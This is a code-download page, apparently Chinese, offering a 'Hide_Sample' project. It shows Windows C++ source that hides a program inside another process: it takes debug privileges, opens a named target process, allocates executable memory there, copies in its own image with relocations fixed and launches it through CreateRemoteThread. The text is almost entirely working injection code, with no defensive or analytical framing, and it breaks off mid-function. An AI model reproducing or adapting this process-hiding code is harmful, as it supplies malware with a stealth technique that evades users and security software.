Hide_Sample.zip_hide_进程 隐藏_进程隐藏_隐藏 进程_隐藏进程

// API.cpp: implementation of the API class. // ////////////////////////////////////////////////////////////////////// #include "API.h" ////////////////////////////////////////////////////////////////////// // Construction/Destruction ////////////////////////////////////////////////////////////////////// #define LOAD_BASE_ADDR 0x03140000 CAPI::CAPI() { Init(); } CAPI::~CAPI() { } CAPI::Init() { GetOSVersion(); m_module=GetModuleHandle(NULL); } void CAPI::GetOSVersion(void) { OSVERSIONINFO osvi; osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); if(GetVersionEx(&osvi)==FALSE) { DMsgBox("Unable to get version info GetOSVersion()"); } if(osvi.dwPlatformId==VER_PLATFORM_WIN32s) { DMsgBox("This application does not run under WIN32s!"); } if (osvi.dwPlatformId == VER_PLATFORM_WIN32_NT) m_bIsWinNT = 1; else m_bIsWinNT = 0; } BOOL CAPI::HideProcessIn(char *szRemoteProcess,LPTHREAD_START_ROUTINE pMyMainProcess,BOOL bNtHideAll) { EnableDebugPriv(); if(m_bIsWinNT) { if(!bNtHideAll) return HideProcessInNT(szRemoteProcess,pMyMainProcess); else return HideProcessInNT_2_All(pMyMainProcess); } else { return HideProcessIn9X(pMyMainProcess); } return TRUE; } BOOL CAPI::HideProcessInNT(char *szRemoteProcess,LPTHREAD_START_ROUTINE pMyMainProcess) { unsigned long lProcessID=GetNTProcessIDbyName(szRemoteProcess); return HideProcessInNTbyID(lProcessID,pMyMainProcess); } BOOL CAPI::HideProcessInNTbyID(unsigned long lProcessID,LPTHREAD_START_ROUTINE pMyMainProcess) { if(lProcessID==-1) return FALSE; //dont inject to our process if(GetCurrentProcessId()==lProcessID) return FALSE; DMsgBox("1"); HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,lProcessID); //open process error. dont have right if(hProc==NULL) return FALSE; HMODULE lnewModule=(HMODULE) LOAD_BASE_ADDR; //alloc mem for our process //VirtualFreeEx(hProc,lnewModule,0,MEM_RELEASE); //compute our process image size DWORD dwSize=((PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET(m_module))->SizeOfImage; // char *pMem=(char *)VirtualAllocEx(hProc,m_module,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); //---------------------------------------------- DMsgBox("2"); char *pMem=NULL; int x=0; while((pMem=(char *)VirtualAllocEx(hProc,lnewModule,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL) { lnewModule-=1024;//one page?? if(((unsigned long)lnewModule)<0x10000) return FALSE;//没有希望了 x=GetLastError(); } if(pMem==NULL) { DMsgBox("VirtualAllocEx Error,多次分配后失敗"); return FALSE; } DMsgBox("3"); char szMsg[200]; if((long)pMem!=LOAD_BASE_ADDR) { sprintf(szMsg,"old model=0X%X; new model=0X%X,pMem=0X%X; 多次分配后成功！",m_module,lnewModule,pMem); DMsgBox(szMsg); } else { sprintf(szMsg,"old model=0X%X; new model=0X%X,pMem=0X%X; 一次分配成功！",m_module,lnewModule,pMem); DMsgBox(szMsg); } //-------------------------------------------------???????????????? if((long)pMem!=(long)lnewModule) { lnewModule=(HMODULE)pMem; DMsgBox("(pMem!=lnewModule)"); } //------------------------------------------------- // copy our process DWORD dwOldProt,dwNumBytes,i; MEMORY_BASIC_INFORMATION mbi; //get my bin code char* pMyExeData=new char[dwSize]; long lMyID=GetCurrentProcessId(); HANDLE hMyProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,lMyID); DWORD dRead; ReadProcessMemory(hMyProc,m_module, pMyExeData,dwSize,&dRead); //fix relocation table FixRelocationTable(pMyExeData,dwSize,(unsigned long)m_module,(unsigned long)pMem); VirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION)); while(mbi.Protect!=PAGE_NOACCESS && mbi.RegionSize!=0) { if(!(mbi.Protect & PAGE_GUARD)) { for(i=0;i<mbi.RegionSize;i+=0x1000) { VirtualProtectEx(hProc,pMem+i,0x1000,PAGE_EXECUTE_READWRITE,&dwOldProt); WriteProcessMemory(hProc,pMem+i,pMyExeData+i,0x1000,&dwNumBytes); } } pMem+=mbi.RegionSize; VirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION)); } // Create a remote thread in the other process DWORD dwRmtThdID; //run it ine new enter point!! long l=(char*)lnewModule-(char*)m_module; HANDLE hRmtThd=CreateRemoteThread(hProc,NULL,0, (LPTHREAD_START_ROUTINE)((long)pMyMainProcess+(long)l), (LPVOID)lnewModule,0,&dwRmtThdID); if(hRmtThd==NULL) { DMsgBox("Could create remote thread error!"); return FALSE; } CloseHandle(hProc); return TRUE; } /******************************************************************* return value: -1 FALSE other ProcessID only for winnt! ********************************************************************/ //#include "psapi.h" //#pragma comment(lib, "Psapi.lib") typedef BOOL (WINAPI* p_EnumProcesses )(DWORD * lpidProcess,DWORD cb, DWORD * cbNeeded ); typedef BOOL (WINAPI* p_EnumProcessModules )( HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded ); typedef DWORD (WINAPI* p_GetModuleBaseName) ( HANDLE hProcess, HMODULE hModule, LPSTR lpBaseName, DWORD nSize ); long CAPI::GetNTProcessIDbyName(char *szName) { if((!m_bIsWinNT)||(!szName)) return -1; HMODULE hModule=LoadLibrary("psapi.dll"); if(hModule==NULL) return -1; p_EnumProcesses pEnumProcesses=(p_EnumProcesses)GetProcAddress(hModule,"EnumProcesses"); p_EnumProcessModules pEnumProcessModules=(p_EnumProcessModules)GetProcAddress(hModule,"EnumProcessModules"); p_GetModuleBaseName pGetModuleBaseName=(p_GetModuleBaseName)GetProcAddress(hModule,"GetModuleBaseNameA"); DWORD aProcesses[1024], cbNeeded, cProcesses; unsigned int i; if ( !pEnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) ) return -1; // Calculate how many process identifiers were returned. cProcesses = cbNeeded / sizeof(DWORD); // Print the name and process identifier for each process. for ( i = 0; i < cProcesses; i++ ) { char szProcessName[MAX_PATH] = ""; // Get a handle to the process. HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcesses[i] ); // Get the process name. if ( hProcess ) { HMODULE hMod; DWORD cbNeeded; if ( pEnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) ) { pGetModuleBaseName( hProcess, hMod, szProcessName, MAX_PATH ); if(_stricmp(szName,szProcessName)==0) {//found process CloseHandle (hProcess); return aProcesses[i]; } } CloseHandle (hProcess); }//end if } return -1; } long CAPI::GetAll(_s_process_info_* spInfo) { int nRet=0; if((!m_bIsWinNT)||(!spInfo)) return nRet; HMODULE hModule=LoadLibrary("psapi.dll"); if(hModule==NULL) return nRet; p_EnumProcesses pEnumProcesses=(p_EnumProcesses)GetProcAddress(hModule,"EnumProcesses"); p_EnumProcessModules pEnumProcessModules=(p_EnumProcessModules)GetProcAddress(hModule,"EnumProcessModules"); p_GetModuleBaseName pGetModuleBaseName=(p_GetModuleBaseName)GetProcAddress(hModule,"GetModuleBaseNameA"); DWORD aProcesses[1024], cbNeeded, cProcesses; unsigned int i; if ( !pEnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) ) return -1; // Calculate how many process identifiers were returned. cProcesses = cbNeeded / sizeof(DWORD); // Print the name and process identifier for each process. for ( i = 0; i < cProcesses; i++ ) { char szProcessName[MAX_PATH] = ""; // Get a handle to the process. HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcesses[i] ); // Get the process name. if ( hProcess ) { HMODULE hMod; DWORD cbNeeded; if ( pEnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) ) { pGetModuleBaseName( hProcess, hMod, szProcessName, MAX_PATH ); nRet++; if(nRet>=MAX_PR